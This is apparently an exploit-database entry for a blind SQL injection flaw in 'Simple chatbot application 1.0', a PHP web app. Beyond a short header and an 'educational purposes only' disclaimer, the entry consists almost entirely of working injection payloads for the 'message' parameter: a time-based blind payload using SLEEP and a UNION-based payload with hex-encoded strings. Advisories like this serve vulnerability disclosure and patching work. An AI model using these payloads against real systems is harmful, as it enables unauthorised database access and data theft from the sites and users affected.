Exploits / Vulnerability Discovered : 2022-01-18 |
Type : webapps |
Platform : php
This exploit / vulnerability Simple chatbot application 1.0 message blind sqli is for educational purposes only and if it is used you will do on your own risk!
message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud
======
#Payloads
#Payload (UNION query)
message=-8150' UNION ALL SELECT CONCAT(0x717a766b71,0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,0x716a7a7171),NULL-- -
#(AND/OR time-based blind)
message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud